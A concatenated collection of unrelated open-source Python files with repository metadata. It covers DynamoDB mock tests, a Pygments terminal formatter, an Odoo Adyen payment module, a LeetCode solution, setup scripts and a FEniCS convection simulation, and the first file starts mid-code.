'SentBy': 'User A',
}
table.put_item(data=data)
key_map = {
"S": "steve"
}
conn.update_item("messages", key_map, update_expression="SET foo=:bar, blah=:baz REMOVE :SentBy")
returned_item = table.get_item(username="steve")
dict(returned_item).should.equal({
'username': "steve",
'foo': 'bar',
'blah': 'baz',
})
@mock_dynamodb2
def test_failed_overwrite():
table = Table.create('messages', schema=[
HashKey('id'),
], throughput={
'read': 7,
'write': 3,
})
data1 = {'id': '123', 'data': '678'}
table.put_item(data=data1)
data2 = {'id': '123', 'data': '345'}
table.put_item(data=data2, overwrite=True)
data3 = {'id': '123', 'data': '812'}
table.put_item.when.called_with(data=data3).should.throw(ConditionalCheckFailedException)
returned_item = table.lookup('123')
dict(returned_item).should.equal(data2)
data4 = {'id': '124', 'data': 812}
table.put_item(data=data4)
returned_item = table.lookup('124')
dict(returned_item).should.equal(data4)
@mock_dynamodb2
def test_conflicting_writes():
table = Table.create('messages', schema=[
HashKey('id'),
])
item_data = {'id': '123', 'data': '678'}
item1 = Item(table, item_data)
item2 = Item(table, item_data)
item1.save()
item1['data'] = '579'
item2['data'] = '912'
item1.save()
item2.save.when.called_with().should.throw(ConditionalCheckFailedException)
"""
boto3
"""
@mock_dynamodb2
def test_boto3_conditions():
dynamodb = boto3.resource('dynamodb', region_name='us-east-1')
# Create the DynamoDB table.
table = dynamodb.create_table(
TableName='users',
KeySchema=[
{
'AttributeName': 'username',
'KeyType': 'HASH'
},
],
AttributeDefinitions=[
{
'AttributeName': 'username',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
}
)
table = dynamodb.Table('users')
table.put_item(Item={'username': 'johndoe'})
table.put_item(Item={'username': 'janedoe'})
response = table.query(
KeyConditionExpression=Key('username').eq('johndoe')
)
response['Count'].should.equal(1)
response['Items'].should.have.length_of(1)
response['Items'][0].should.equal({"username": "johndoe"})
|
rouge8/moto
|
tests/test_dynamodb2/test_dynamodb_table_without_range_key.py
|
Python
|
apache-2.0
| 13,379
|
import ast
import os
import pytest
from flake8_import_order import pylama_linter
from tests.utils import extract_expected_errors
def load_test_cases():
base_path = os.path.dirname(__file__)
test_case_path = os.path.join(base_path, "test_cases")
test_case_files = os.listdir(test_case_path)
test_cases = []
for fname in test_case_files:
if not fname.endswith(".py"):
continue
fullpath = os.path.join(test_case_path, fname)
data = open(fullpath).read()
codes, messages = extract_expected_errors(data)
test_cases.append((fullpath, codes, messages))
return test_cases
@pytest.mark.parametrize(
"filename, expected_codes, expected_messages",
load_test_cases()
)
def test_expected_error(filename, expected_codes, expected_messages):
checker = pylama_linter.Linter()
assert checker.allow(filename)
codes = []
messages = []
options = {
"application_import_names": ["flake8_import_order", "tests"],
"application_package_names": ["local_package"],
}
for style in ['google', 'smarkets', 'pep8']:
if style in filename:
options['import_order_style'] = style
break
for error in checker.run(filename, **options):
codes.append(error['type'])
messages.append(error['text'])
assert codes == expected_codes
assert set(messages) >= set(expected_messages)
|
jhuttner/flake8-import-order
|
tests/test_pylama_linter.py
|
Python
|
lgpl-3.0
| 1,440
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ListYourRepos
# Retrieves a list of repositories for the authenticated user.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListYourRepos(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListYourRepos Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListYourRepos, self).__init__(temboo_session, '/Library/GitHub/ReposAPI/Repos/ListYourRepos')
def new_input_set(self):
return ListYourReposInputSet()
def _make_result_set(self, result, path):
return ListYourReposResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListYourReposChoreographyExecution(session, exec_id, path)
class ListYourReposInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListYourRepos
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
"""
super(ListYourReposInputSet, self)._set_input('AccessToken', value)
def set_Direction(self, value):
"""
Set the value of the Direction input for this Choreo. ((optional, string) Valid values are asc or desc. Default behavior is desc unless sorting by full_name in which case, the direction is asc.)
"""
super(ListYourReposInputSet, self)._set_input('Direction', value)
def set_Page(self, value):
"""
Set the value of the Page input for this Choreo. ((optional, integer) Indicates the page index that you want to retrieve. This is used to page through many results. Defaults to 1.)
"""
super(ListYourReposInputSet, self)._set_input('Page', value)
def set_Sort(self, value):
"""
Set the value of the Sort input for this Choreo. ((optional, string) The sort order of the results. Valid values are: created, updated, pushed, or full_name (the default).)
"""
super(ListYourReposInputSet, self)._set_input('Sort', value)
def set_Type(self, value):
"""
Set the value of the Type input for this Choreo. ((optional, string) The type of repos to return. Valid values are: all (the default), owner, public, private, or member.)
"""
super(ListYourReposInputSet, self)._set_input('Type', value)
class ListYourReposResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListYourRepos Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from GitHub.)
"""
return self._output.get('Response', None)
def get_LastPage(self):
"""
Retrieve the value for the "LastPage" output from this Choreo execution. ((integer) If multiple pages are available for the response, this contains the last available page.)
"""
return self._output.get('LastPage', None)
def get_Limit(self):
"""
Retrieve the value for the "Limit" output from this Choreo execution. ((integer) The available rate limit for your account. This is returned in the GitHub response header.)
"""
return self._output.get('Limit', None)
def get_NextPage(self):
"""
Retrieve the value for the "NextPage" output from this Choreo execution. ((integer) If multiple pages are available for the response, this contains the next page that you should retrieve.)
"""
return self._output.get('NextPage', None)
def get_Remaining(self):
"""
Retrieve the value for the "Remaining" output from this Choreo execution. ((integer) The remaining number of API requests available to you. This is returned in the GitHub response header.)
"""
return self._output.get('Remaining', None)
class ListYourReposChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListYourReposResultSet(response, path)
|
willprice/arduino-sphere-project
|
scripts/example_direction_finder/temboo/Library/GitHub/ReposAPI/Repos/ListYourRepos.py
|
Python
|
gpl-2.0
| 5,378
|
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.configuration import Configuration
from opus_core.session_configuration import SessionConfiguration
class Resources(Configuration):
"""In addition to everything in GeneralResources it has an access to SessionConfiguration."""
def __init__(self, data={}):
"""The argument 'data' is a python native dictionary (class 'dict').
"""
Configuration.__init__(self, data)
def __getitem__(self, key):
"""First check for key in my configuration; then check in Session configuration"""
try:
return Configuration.__getitem__(self, key)
except KeyError:
return SessionConfiguration().get_dataset_from_pool(key)
def is_in(self, key):
"""Return True if 'key' is in the dictionary or session configuration, otherwise False.
"""
return (self.has_key(key) or SessionConfiguration().has_key(key))
def copy(self):
c = Resources()
c.merge(self)
return c
# Functions
############
def merge_resources_if_not_None(resources=None, pairs=[]):
"""Wrapper for the method merge_if_not_None."""
if isinstance(resources, dict):
resources = Resources(resources)
if not isinstance(resources, Resources):
resources = Resources()
return resources.merge_if_not_None(pairs_to_dict(pairs))
def merge_resources_with_defaults(resources=None, pairs=[]):
"""Wrapper for the method merge_with_defaults."""
if isinstance(resources, dict):
resources = Resources(resources)
if not isinstance(resources, Resources):
resources = Resources()
return resources.merge_with_defaults(pairs_to_dict(pairs))
def pairs_to_dict(pairs):
"""Convert list of tuples into dictionary."""
result = {}
for pair in pairs:
result[pair[0]]=pair[1]
return result
|
christianurich/VIBe2UrbanSim
|
3rdparty/opus/src/opus_core/resources.py
|
Python
|
gpl-2.0
| 2,116
|
# -*- coding: utf-8 -*-
"""
pygments.formatters.terminal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for terminal output with ANSI sequences.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
from pygments.console import ansiformat
from pygments.util import get_choice_opt
__all__ = ['TerminalFormatter']
#: Map token types to a tuple of color values for light and dark
#: backgrounds.
TERMINAL_COLORS = {
Token: ('', ''),
Whitespace: ('lightgray', 'darkgray'),
Comment: ('lightgray', 'darkgray'),
Comment.Preproc: ('teal', 'turquoise'),
Keyword: ('darkblue', 'blue'),
Keyword.Type: ('teal', 'turquoise'),
Operator.Word: ('purple', 'fuchsia'),
Name.Builtin: ('teal', 'turquoise'),
Name.Function: ('darkgreen', 'green'),
Name.Namespace: ('_teal_', '_turquoise_'),
Name.Class: ('_darkgreen_', '_green_'),
Name.Exception: ('teal', 'turquoise'),
Name.Decorator: ('darkgray', 'lightgray'),
Name.Variable: ('darkred', 'red'),
Name.Constant: ('darkred', 'red'),
Name.Attribute: ('teal', 'turquoise'),
Name.Tag: ('blue', 'blue'),
String: ('brown', 'brown'),
Number: ('darkblue', 'blue'),
Generic.Deleted: ('red', 'red'),
Generic.Inserted: ('darkgreen', 'green'),
Generic.Heading: ('**', '**'),
Generic.Subheading: ('*purple*', '*fuchsia*'),
Generic.Error: ('red', 'red'),
Error: ('_red_', '_red_'),
}
class TerminalFormatter(Formatter):
r"""
Format tokens with ANSI color sequences, for output in a text console.
Color sequences are terminated at newlines, so that paging the output
works correctly.
The `get_style_defs()` method doesn't do anything special since there is
no support for common styles.
Options accepted:
`bg`
Set to ``"light"`` or ``"dark"`` depending on the terminal's background
(default: ``"light"``).
`colorscheme`
A dictionary mapping token types to (lightbg, darkbg) color names or
``None`` (default: ``None`` = use builtin colorscheme).
"""
name = 'Terminal'
aliases = ['terminal', 'console']
filenames = []
def __init__(self, **options):
Formatter.__init__(self, **options)
self.darkbg = get_choice_opt(options, 'bg',
['light', 'dark'], 'light') == 'dark'
self.colorscheme = options.get('colorscheme', None) or TERMINAL_COLORS
def format(self, tokensource, outfile):
# hack: if the output is a terminal and has an encoding set,
# use that to avoid unicode encode problems
if not self.encoding and hasattr(outfile, "encoding") and \
hasattr(outfile, "isatty") and outfile.isatty() and \
sys.version_info < (3,):
self.encoding = outfile.encoding
return Formatter.format(self, tokensource, outfile)
def format_unencoded(self, tokensource, outfile):
for ttype, value in tokensource:
color = self.colorscheme.get(ttype)
while color is None:
ttype = ttype[:-1]
color = self.colorscheme.get(ttype)
if color:
color = color[self.darkbg]
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write(ansiformat(color, line))
outfile.write('\n')
if spl[-1]:
outfile.write(ansiformat(color, spl[-1]))
else:
outfile.write(value)
|
kirbyfan64/pygments-unofficial
|
pygments/formatters/terminal.py
|
Python
|
bsd-2-clause
| 4,065
|
class Solution(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if len(s) < 2 or numRows == 1:
return s
sub_str = []
for i in range(1, numRows-1):
s1 = s[i:len(s):2*numRows-2]
s2 = s[2*(numRows-1)-i:len(s):2*numRows-2]
sub = [0] * (len(s1)+len(s2))
sub[::2] = s1
sub[1::2] = s2
sub_str += sub
return s[::2*numRows-2]+"".join(str(x) for x in sub_str)+s[numRows-1:len(s):2*numRows-2]
|
taulk/oj
|
LeetCode/[6]zigzag-conversion/Solution.py
|
Python
|
unlicense
| 585
|
# -*- coding: utf-'8' "-*-"
import base64
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
_inherit = 'payment.acquirer'
def _get_adyen_urls(self, cr, uid, environment, context=None):
""" Adyen URLs
- yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
"""
return {
'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % ('live' if environment == 'prod' else environment),
}
def _get_providers(self, cr, uid, context=None):
providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
providers.append(['adyen', 'Adyen'])
return providers
_columns = {
'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
}
def _adyen_generate_merchant_sig(self, acquirer, inout, values):
""" Generate the shasign for incoming or outgoing communications.
:param browse acquirer: the payment.acquirer browse record. It should
have a shakey in shaky out
:param string inout: 'in' (openerp contacting ogone) or 'out' (adyen
contacting openerp). In this last case only some
fields should be contained (see e-Commerce basic)
:param dict values: transaction values
:return string: shasign
"""
assert inout in ('in', 'out')
assert acquirer.provider == 'adyen'
if inout == 'in':
keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
else:
keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()
def get_value(key):
if values.get(key):
return values[key]
return ''
sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
key = acquirer.adyen_skin_hmac_key.encode('ascii')
return base64.b64encode(hmac.new(key, sign, sha1).digest())
def adyen_form_generate_values(self, cr, uid, id, values, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
acquirer = self.browse(cr, uid, id, context=context)
# tmp
import datetime
from dateutil import relativedelta
tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
values.update({
'merchantReference': values['reference'],
'paymentAmount': '%d' % int(float_round(values['amount'], 2) * 100),
'currencyCode': values['currency'] and values['currency'].name or '',
'shipBeforeDate': tmp_date,
'skinCode': acquirer.adyen_skin_code,
'merchantAccount': acquirer.adyen_merchant_account,
'shopperLocale': values.get('partner_lang'),
'sessionValidity': tmp_date,
'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
'merchantReturnData': json.dumps({'return_url': '%s' % values.pop('return_url')}) if values.get('return_url') else False,
'merchantSig': self._adyen_generate_merchant_sig(acquirer, 'in', values),
})
return values
def adyen_get_form_action_url(self, cr, uid, id, context=None):
acquirer = self.browse(cr, uid, id, context=context)
return self._get_adyen_urls(cr, uid, acquirer.environment, context=context)['adyen_form_url']
class TxAdyen(osv.Model):
_inherit = 'payment.transaction'
# --------------------------------------------------
# FORM RELATED METHODS
# --------------------------------------------------
def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
reference, pspReference = data.get('merchantReference'), data.get('pspReference')
if not reference or not pspReference:
error_msg = _('Adyen: received data with missing reference (%s) or missing pspReference (%s)') % (reference, pspReference)
_logger.info(error_msg)
raise ValidationError(error_msg)
# find tx -> @TDENOTE use pspReference ?
tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
if not tx_ids or len(tx_ids) > 1:
error_msg = _('Adyen: received data for reference %s') % (reference)
if not tx_ids:
error_msg += _('; no order found')
else:
error_msg += _('; multiple order found')
_logger.info(error_msg)
raise ValidationError(error_msg)
tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)
# verify shasign
shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
if shasign_check != data.get('merchantSig'):
error_msg = _('Adyen: invalid merchantSig, received %s, computed %s') % (data.get('merchantSig'), shasign_check)
_logger.warning(error_msg)
raise ValidationError(error_msg)
return tx
def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
invalid_parameters = []
# reference at acquirer: pspReference
if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
# seller
if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
# result
if not data.get('authResult'):
invalid_parameters.append(('authResult', data.get('authResult'), 'something'))
return invalid_parameters
def _adyen_form_validate(self, cr, uid, tx, data, context=None):
status = data.get('authResult', 'PENDING')
if status == 'AUTHORISED':
tx.write({
'state': 'done',
'acquirer_reference': data.get('pspReference'),
# 'date_validate': data.get('payment_date', fields.datetime.now()),
# 'paypal_txn_type': data.get('express_checkout')
})
return True
elif status == 'PENDING':
tx.write({
'state': 'pending',
'acquirer_reference': data.get('pspReference'),
})
return True
else:
error = _('Adyen: feedback error')
_logger.info(error)
tx.write({
'state': 'error',
'state_message': error
})
return False
|
minhphung171093/GreenERP
|
openerp/addons/payment_adyen/models/adyen.py
|
Python
|
gpl-3.0
| 7,511
|
import json
import datetime
from django.core.files.base import ContentFile
from django.core.exceptions import ValidationError
from django.utils.timezone import utc
from ..models import AgentProfile
from ..exceptions import IDNotFoundError, ParamError
from ..utils import etag
class AgentProfileManager():
def __init__(self, agent):
self.Agent = agent
def save_non_json_profile(self, p, profile, request_dict):
p.content_type = request_dict['headers']['CONTENT_TYPE']
p.etag = etag.create_tag(profile.read())
if 'updated' in request_dict['headers'] and request_dict['headers']['updated']:
p.updated = request_dict['headers']['updated']
else:
p.updated = datetime.datetime.utcnow().replace(tzinfo=utc)
# Go to beginning of file
profile.seek(0)
fn = "%s_%s" % (p.agent_id, request_dict.get('filename', p.id))
p.profile.save(fn, profile)
p.save()
def post_profile(self, request_dict):
# get/create profile
p, created = AgentProfile.objects.get_or_create(
profile_id=request_dict['params']['profileId'], agent=self.Agent)
post_profile = request_dict['profile']
# If incoming profile is application/json and if a profile didn't
# already exist with the same agent and profileId
if created:
p.json_profile = post_profile
p.content_type = "application/json"
p.etag = etag.create_tag(post_profile)
# If incoming profile is application/json and if a profile already
# existed with the same agent and profileId
else:
orig_prof = json.loads(p.json_profile)
post_profile = json.loads(post_profile)
merged = json.dumps(
dict(list(orig_prof.items()) + list(post_profile.items())))
p.json_profile = merged
p.etag = etag.create_tag(merged)
# Set updated
if 'updated' in request_dict['headers'] and request_dict['headers']['updated']:
p.updated = request_dict['headers']['updated']
else:
p.updated = datetime.datetime.utcnow().replace(tzinfo=utc)
p.save()
def put_profile(self, request_dict):
# get/create profile
p, created = AgentProfile.objects.get_or_create(
profile_id=request_dict['params']['profileId'], agent=self.Agent)
# Profile being PUT is not json
if "application/json" not in request_dict['headers']['CONTENT_TYPE']:
try:
profile = ContentFile(request_dict['profile'].read())
except:
try:
profile = ContentFile(request_dict['profile'])
except:
profile = ContentFile(str(request_dict['profile']))
etag.check_preconditions(request_dict, p, created)
# If it already exists delete it
if p.profile:
try:
p.profile.delete()
except OSError:
# probably was json before
p.json_profile = {}
self.save_non_json_profile(p, profile, request_dict)
# Profile being PUT is json
else:
# (overwrite existing profile data)
etag.check_preconditions(request_dict, p, created)
the_profile = request_dict['profile']
p.json_profile = the_profile
p.content_type = request_dict['headers']['CONTENT_TYPE']
p.etag = etag.create_tag(the_profile)
# Set updated
if 'updated' in request_dict['headers'] and request_dict['headers']['updated']:
p.updated = request_dict['headers']['updated']
else:
p.updated = datetime.datetime.utcnow().replace(tzinfo=utc)
p.save()
def get_profile(self, profile_id):
try:
return self.Agent.agentprofile_set.get(profile_id=profile_id)
except:
err_msg = 'There is no agent profile associated with the id: %s' % profile_id
raise IDNotFoundError(err_msg)
def get_profile_ids(self, since=None):
ids = []
if since:
try:
# this expects iso6801 date/time format
# "2013-02-15T12:00:00+00:00"
profs = self.Agent.agentprofile_set.filter(updated__gt=since)
except ValidationError:
err_msg = 'Since field is not in correct format for retrieval of agent profiles'
raise ParamError(err_msg)
ids = [p.profile_id for p in profs]
else:
ids = self.Agent.agentprofile_set.values_list(
'profile_id', flat=True)
return ids
def delete_profile(self, profile_id):
try:
self.get_profile(profile_id).delete()
# we don't want it anyway
except AgentProfile.DoesNotExist:
pass
except IDNotFoundError:
pass
|
adlnet/ADL_LRS
|
lrs/managers/AgentProfileManager.py
|
Python
|
apache-2.0
| 5,034
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
import os
from setuptools import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
setup(
name='django-pudb',
version='0.1.0',
description='PuDB integration for Django.',
long_description=read('README.md'),
url='https://github.com/akanouras/django-pudb/',
license='MIT',
author='Antonis Kanouras',
author_email='antonis@metadosis.eu',
py_modules=['django_pudb'],
include_package_data=True,
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
akanouras/django-pudb
|
setup.py
|
Python
|
mit
| 1,352
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from setuptools import setup, find_packages
PACKAGE_VERSION = '0.1'
deps = [
'marionette-client == 0.8.7',
]
setup(name='firefox-ui-tests',
version=PACKAGE_VERSION,
description='A collection of Mozilla Firefox UI tests run with Marionette',
long_description='See https://github.com/mozilla/firefox-ui-tests',
classifiers=['Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
keywords='mozilla',
author='Mozilla Automation and Tools Team',
author_email='tools@lists.mozilla.org',
url='https://github.com/mozilla/firefox-ui-tests',
license='MPL 2.0',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=deps,
entry_points="""
[console_scripts]
firefox-ui-tests = firefox_ui_harness:run
""")
|
chmanchester/firefox-ui-tests
|
setup.py
|
Python
|
mpl-2.0
| 1,414
|
""" Defines the base class for color maps
"""
from traits.api import Enum, HasTraits, Instance
from data_range_1d import DataRange1D
class AbstractColormap(HasTraits):
"""
Abstract class for color maps, which map from scalar values to color values.
"""
# The data-space bounds of the mapper.
range = Instance(DataRange1D)
# The color depth of the colors to use.
color_depth = Enum('rgba', 'rgb')
def map_screen(self, val):
"""
map_screen(val) -> color
Maps an array of values to an array of colors. If the input array is
NxM, the returned array is NxMx3 or NxMx4, depending on the
**color_depth** setting.
"""
raise NotImplementedError()
def map_data(self, ary):
"""
map_data(ary) -> color_array
Returns an array of values containing the colors mapping to the values
in *ary*. If the input array is NxM, the returned array is NxMx3 or
NxMx4, depending on the **color_depth** setting.
"""
# XXX this seems bogus: by analogy with AbstractMapper, this should map
# colors to data values, and that will be generally hard to do well.
# no subclass implements this - CJW
raise NotImplementedError()
def map_index(self, ary):
"""
map_index(ary) -> index into color_bands
This method is like map_screen(), but it returns an array of indices
into the color map's color bands instead of an array of colors. If the
input array is NxM, then the output is NxM integer indices.
This method might not apply to all color maps. Ones that cannot
define a static set of color bands (e.g., function-defined color maps)
are not able to implement this function.
"""
raise NotImplementedError()
def map_uint8(self, val):
"""
map_uint8(val) -> rgb24 or rgba32 color
Maps a single value to a single color. Color is represented as either
length-3 or length-4 array of rgb(a) uint8 values, depending on the
**color_depth** setting.
"""
# default implementation (not efficient)
return (self.map_screen(val)*255.0).astype('uint8')
# EOF
|
burnpanck/chaco
|
chaco/abstract_colormap.py
|
Python
|
bsd-3-clause
| 2,253
|
#! /usr/bin/env python
from dolfin import *
from utilities import *
set_dolfin_optimisation()
from dolfin_fvm import *
import numpy
import argparse
parser = argparse.ArgumentParser(description = 'coupling demo')
parser.add_argument('--correct', action='store_true', default=False)
parser.add_argument('--limit', action='store_true', default=False)
parser.add_argument('--Ra', type=float, default = 1e6)
parser.add_argument('--tol', type=float, default = 1e-8)
parser.add_argument('--n', type=int, default = 40)
parser.add_argument('--CFL', type=float, default = 1.0)
parser.add_argument('--tend', type=float, default = 1)
parser.add_argument('--dim', type=int, default = 2)
parser.add_argument('--sparselu', action='store_true', default=False)
parser.add_argument('--secondorder', action='store_true', default=False)
parser.add_argument('--update_u_every', type=int, default = 1)
parser.add_argument('--adaptlayers', type=int, default=2)
parser.add_argument('--refine', type=int, default=0)
parser.add_argument('--graddiv_pen', type=float, default = 0.0)
parser.add_argument('--output', action='store_true', default=False)
parser.add_argument('--plot', action='store_true', default=False)
args = parser.parse_args()
print args
# problem definition
if args.dim is 2:
mesh = UnitSquareMesh(args.n, args.n, 'crossed')
elif args.dim is 3:
mesh = UnitCubeMesh(args.n, args.n, args.n)
else:
print 'dimension {0} not supported!'.format(args.dim)
exit()
vol = assemble(1*dx(mesh))
dim = mesh.topology().dim()
mesh = refine_boundary_layers(mesh, args.adaptlayers, range(dim), [0.0]*dim, [1.0]*dim)
for i in xrange(args.refine):
mesh = refine(mesh)
#plot(mesh, interactive=True); exit()
ccfl = args.CFL
eps = Constant(1.0/args.Ra)
theta_init_expr = '1.0 - x[0]'
theta_init = Expression(theta_init_expr)
# function spaces
V = VectorFunctionSpace(mesh, 'CG', 1)
Vd = VectorFunctionSpace(mesh, 'DG', 1)
Q = FunctionSpace(mesh, 'CG', 1)
R = FunctionSpace(mesh, 'R', 0)
W = MixedFunctionSpace([V, Q, R])
u, p, m = TrialFunctions(W)
v, q, r = TestFunctions(W)
wh = Function(W)
uh, ph, rh = wh.split()
theta = interpolate(theta_init, Q)
theta_0 = Function(Q)
theta_1 = theta
theta_2 = Function(Q)
theta_min = min(theta.vector()[:])
theta_max = max(theta.vector()[:])
h = CellSize(mesh)
nu = Constant(1)
ez = as_vector([0]*(dim-1) + [-1])
F = -ez*theta_1
delta = h**2*Constant(1./12)/nu
gamma = Constant(args.graddiv_pen)
# free-slip boundary conditions for velocity
bc_u = [ DirichletBC(W.sub(0), Constant([0.0]*dim), 'on_boundary') ]
# boundary conditions for temperature
left = CompiledSubDomain('on_boundary && near(x[0], 0.0)')
right = CompiledSubDomain('on_boundary && near(x[0], 1.0)')
bc_theta = [ DirichletBC(Q, theta_init, left), DirichletBC(Q, theta_init, right) ]
# bilinear and linear forms
def a(u,v): return inner(2*nu*sym(grad(u)),grad(v))*dx
def b(v,q): return -div(v)*q*dx
def f(v): return dot(F, v)*dx
# variational problem
stokes = a(u,v) + b(v,p) + b(u,q) - f(v) \
+ gamma*div(u)*div(v)*dx \
- dot(delta*grad(p), grad(q))*dx \
+ p*r*dx + m*q*dx
stokes_prec = inner(nu*grad(u),grad(v))*dx - p*q/nu*dx - m*r*dx - f(v)
t, i = 0.0, 0
log = []
U = Function(Vd)
# lumped mass
tmp = Vector(theta.vector())
p, q = TrialFunction(Q), TestFunction(Q)
l_mass = assemble(action(p*q*dx, Constant(1)))
# operators
A = assemble(lhs(stokes))
l = assemble(rhs(stokes))
if args.sparselu:
solver = LUSolver()
solver.set_operator(A)
else:
amg = 'amg' if not has_krylov_solver_preconditioner('ml_amg') else 'ml_amg'
solver = KrylovSolver('tfqmr', amg)
solver.parameters['nonzero_initial_guess'] = True
solver.parameters['relative_tolerance'] = 1e-8
#solver.parameters['monitor_convergence'] = True
P = assemble(lhs(stokes_prec))
for bc in bc_u: bc.apply(P, l)
solver.set_operators(A, P)
# Stokes part
def solve_stokes():
# solve Stokes part
l = assemble(rhs(stokes))
for bc in bc_u: bc.apply(A, l)
its = solver.solve(wh.vector(), l)
# corrected mass flux
U.assign(project(uh - delta*grad(ph) if args.correct else uh, Vd))
return its
# temperature part
def advance_temperature(theta_new, theta_old):
# diffusion part
assemble(dot(-eps*grad(theta_old), grad(q))*dx, tensor = tmp)
for idx, tmpidx in enumerate(tmp):
tmp[idx] = tmpidx/l_mass[idx]
# advection part
theta_new.assign(theta_old)
advance(theta_new, theta_old, U, dt)
theta_new.vector().axpy(dt, tmp)
theta_new.vector().apply('insert')
its = solve_stokes() # initial field
while t < args.tend + DOLFIN_EPS:
# compute CFL
umax = numpy.max(numpy.abs(U.vector().array()))
#umax = sqrt(numpy.max(project(dot(U,U), Q).vector().array()))
dt = ccfl*min(0.25*args.Ra*mesh.hmin()**2, mesh.hmin()/umax)
theta_0.assign(theta)
# theta^(1) = theta^n + dt*L(theta^n)
advance_temperature(theta_1, theta_0)
# intermediate solve
if not (i % args.update_u_every):
its = solve_stokes()
else:
its = 0
if args.secondorder: # explicit SSP(2,2) Runge-Kutta
# theta^(2) = theta^(1) + dt*L(theta^(1))
advance_temperature(theta_2, theta_1)
# theta^{n+1} = 0.5*(theta^n + theta^(2))
theta.vector()[:] = 0.0
theta.vector().axpy(0.5, theta_0.vector())
theta.vector().axpy(0.5, theta_2.vector())
else: # explicit Euler
# theta^{n+1} = theta^(1) = theta^n + dt*L(theta^n)
theta.assign(theta_1)
for bc in bc_theta: bc.apply(theta.vector())
#theta.vector().apply('insert')
if(args.limit): # limit to physical bounds
theta.vector()[theta.vector() < theta_min] = theta_min
theta.vector()[theta.vector() > theta_max] = theta_max
